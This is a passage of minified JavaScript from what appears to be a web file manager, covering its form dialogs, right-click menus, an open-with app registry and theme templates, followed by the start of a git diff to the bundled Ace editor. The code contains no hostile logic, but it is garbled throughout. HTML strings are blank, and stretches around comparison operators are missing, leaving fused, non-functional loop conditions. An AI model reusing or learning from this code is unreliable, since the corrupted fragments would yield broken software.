n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
      ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},g=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},b=function(e,t,a){var i=g(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:g,bindEvent:o,getFormData:m,initDialog:b}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
    • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
    • '+r(o.icon)+""+d+"
    • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n}); +var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p};if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
      ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first")}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},g=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return g(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
      ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
      '+LNG.unknow_file_tips+"
      "+t+'
      2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
      3.'+r+o+'">'+LNG.unknow_file_download+'
      '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
      ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:10,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("webloc"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()}),Hook.bind("rightMenu.initFinished",function(){if(1!=G.isRoot){var e="hidden";if(core.authCheck("explorer.fileDownload")||(kodApp.remove("browserOpen"),$(".context-menu-list .down,.context-menu-list .download").addClass(e),$(".context-menu-list .share").addClass(e),$(".context-menu-list .open-text").addClass(e),$(".pathinfo .open-window").addClass(e),$(".context-menu-list .open-browser").addClass(e)),core.authCheck("explorer.search")||$(".context-menu-list .search").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder").addClass(e),core.authCheck("userShare.set")||$(".context-menu-list .share").remove(),core.authCheck("explorer.mkfile")||$(".context-menu-list .newfile,.tool-path-newfile").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder,[data-action=newfolder]").addClass(e),core.authCheck("explorer.pathCopy")||($(".context-menu-list .cute").addClass(e),$(".context-menu-list .copy").addClass(e)),!core.authCheck("explorer.fileUpload")){$(".context-menu-list .upload").addClass(e);var t=$("[data-action=upload-more]");t.exists()&&t.parent().addClass(e)}}})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"); \ No newline at end of file diff --git a/static/js/lib/ace/src-min-noconflict/ace.js b/static/js/lib/ace/src-min-noconflict/ace.js index 5dfda26..1834628 100755 --- a/static/js/lib/ace/src-min-noconflict/ace.js +++ b/static/js/lib/ace/src-min-noconflict/ace.js @@ -1,4 +1,4 @@ -(function(){function o(n){var i=e;n&&(e[n]||(e[n]={}),i=e[n]);if(!i.define||!i.define.packaged)t.original=i.define,i.define=t,i.define.packaged=!0;if(!i.require||!i.require.packaged)r.original=i.require,i.require=r,i.require.packaged=!0}var ACE_NAMESPACE = "ace",e=function(){return this}();!e&&typeof window!="undefined"&&(e=window);if(!ACE_NAMESPACE&&typeof requirejs!="undefined")return;var t=function(e,n,r){if(typeof e!="string"){t.original?t.original.apply(this,arguments):(console.error("dropping module because define wasn't a string."),console.trace());return}arguments.length==2&&(r=n),t.modules[e]||(t.payloads[e]=r,t.modules[e]=null)};t.modules={},t.payloads={};var n=function(e,t,n){if(typeof t=="string"){var i=s(e,t);if(i!=undefined)return n&&n(),i}else if(Object.prototype.toString.call(t)==="[object Array]"){var o=[];for(var u=0,a=t.length;u1&&u(t,"")>-1&&(a=RegExp(this.source,r.replace.call(o(this),"g","")),r.replace.call(e.slice(t.index),a,function(){for(var e=1;et.index&&this.lastIndex--}return t},s||(RegExp.prototype.test=function(e){var t=r.exec.call(this,e);return t&&this.global&&!t[0].length&&this.lastIndex>t.index&&this.lastIndex--,!!t})}),ace.define("ace/lib/es5-shim",["require","exports","module"],function(e,t,n){function r(){}function w(e){try{return Object.defineProperty(e,"sentinel",{}),"sentinel"in e}catch(t){}}function H(e){return e=+e,e!==e?e=0:e!==0&&e!==1/0&&e!==-1/0&&(e=(e>0||-1)*Math.floor(Math.abs(e))),e}function B(e){var t=typeof e;return e===null||t==="undefined"||t==="boolean"||t==="number"||t==="string"}function j(e){var t,n,r;if(B(e))return e;n=e.valueOf;if(typeof n=="function"){t=n.call(e);if(B(t))return t}r=e.toString;if(typeof r=="function"){t=r.call(e);if(B(t))return t}throw new TypeError}Function.prototype.bind||(Function.prototype.bind=function(t){var n=this;if(typeof n!="function")throw new TypeError("Function.prototype.bind called on incompatible "+n);var i=u.call(arguments,1),s=function(){if(this instanceof s){var e=n.apply(this,i.concat(u.call(arguments)));return Object(e)===e?e:this}return n.apply(t,i.concat(u.call(arguments)))};return n.prototype&&(r.prototype=n.prototype,s.prototype=new r,r.prototype=null),s});var i=Function.prototype.call,s=Array.prototype,o=Object.prototype,u=s.slice,a=i.bind(o.toString),f=i.bind(o.hasOwnProperty),l,c,h,p,d;if(d=f(o,"__defineGetter__"))l=i.bind(o.__defineGetter__),c=i.bind(o.__defineSetter__),h=i.bind(o.__lookupGetter__),p=i.bind(o.__lookupSetter__);if([1,2].splice(0).length!=2)if(!function(){function e(e){var t=new Array(e+2);return t[0]=t[1]=0,t}var t=[],n;t.splice.apply(t,e(20)),t.splice.apply(t,e(26)),n=t.length,t.splice(5,0,"XXX"),n+1==t.length;if(n+1==t.length)return!0}())Array.prototype.splice=function(e,t){var n=this.length;e>0?e>n&&(e=n):e==void 0?e=0:e<0&&(e=Math.max(n+e,0)),e+ta)for(h=l;h--;)this[f+h]=this[a+h];if(s&&e===c)this.length=c,this.push.apply(this,i);else{this.length=c+s;for(h=0;h>>0;if(a(t)!="[object Function]")throw new TypeError;while(++s>>0,s=Array(i),o=arguments[1];if(a(t)!="[object Function]")throw new TypeError(t+" is not a function");for(var u=0;u>>0,s=[],o,u=arguments[1];if(a(t)!="[object Function]")throw new TypeError(t+" is not a function");for(var f=0;f>>0,s=arguments[1];if(a(t)!="[object Function]")throw new TypeError(t+" is not a function");for(var o=0;o>>0,s=arguments[1];if(a(t)!="[object Function]")throw new TypeError(t+" is not a function");for(var o=0;o>>0;if(a(t)!="[object Function]")throw new TypeError(t+" is not a function");if(!i&&arguments.length==1)throw new TypeError("reduce of empty array with no initial value");var s=0,o;if(arguments.length>=2)o=arguments[1];else do{if(s 